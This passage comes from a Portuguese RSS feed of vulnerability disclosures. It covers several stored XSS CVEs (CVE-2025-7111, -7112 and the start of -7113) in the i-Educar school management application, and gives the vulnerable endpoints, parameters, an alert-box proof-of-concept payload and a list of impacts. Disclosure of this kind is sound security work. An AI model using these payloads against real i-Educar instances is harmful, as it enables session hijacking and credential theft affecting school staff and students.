&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7110.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7111</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7111/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7111/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7111-cross-site-scripting-xss-armazenado-no-endpoint-educar_curso_detphp-parâmetro-curso&amp;#34;&amp;gt;CVE-2025-7111: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_curso_det.php?cod_curso=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7111-cross-site-scripting-xss-armazenado-no-endpoint-educar_curso_detphp-parâmetro-curso&amp;#34;&amp;gt;CVE-2025-7111: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7111&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_curso_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_curso_det.php?cod_curso=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Curso&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7111/image.png&amp;#34;
	width=&amp;#34;1845&amp;#34;
	height=&amp;#34;985&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7111/image_hu_789b98f8f3f54c8b.png 480w, /p/cve-2025-7111/image_hu_745ad6b2ae48e3f3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7111/image-1.png&amp;#34;
	width=&amp;#34;1754&amp;#34;
	height=&amp;#34;876&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7111/image-1_hu_1ed9a19b48325f7f.png 480w, /p/cve-2025-7111/image-1_hu_8894ad2a5a40a977.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;480px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/NtkxXKrSa6o&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/NtkxXKrSa6o&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7112</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7112/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7112/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7112-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_detphp-parâmetro-funcao&amp;#34;&amp;gt;CVE-2025-7112: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_det.php?cod_funcao=COD&amp;amp;amp;ref_cod_instituicao=COD&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7112-cross-site-scripting-xss-armazenado-no-endpoint-educar_funcao_detphp-parâmetro-funcao&amp;#34;&amp;gt;CVE-2025-7112: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_funcao_det.php?cod_funcao=COD&amp;amp;amp;ref_cod_instituicao=COD&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Funcao&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image.png&amp;#34;
	width=&amp;#34;1830&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image_hu_c648a8cea385efc9.png 480w, /p/cve-2025-7112/image_hu_5f86e83fa1837d9b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image-1.png&amp;#34;
	width=&amp;#34;1811&amp;#34;
	height=&amp;#34;1013&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image-1_hu_cc5ec209f8eaa4ed.png 480w, /p/cve-2025-7112/image-1_hu_9104ce786d725fe2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;178&amp;#34;
		data-flex-basis=&amp;#34;429px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image-2.png&amp;#34;
	width=&amp;#34;1761&amp;#34;
	height=&amp;#34;929&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image-2_hu_c89aaa0af0099f1c.png 480w, /p/cve-2025-7112/image-2_hu_f51184360f4e8d6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/R6vJIZnjdmE&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/R6vJIZnjdmE&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7113</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7113/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7113/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7113-cross-site-scripting-xss-armazenado-no-endpoint-educar_componente_curricular_lstphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-7113: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
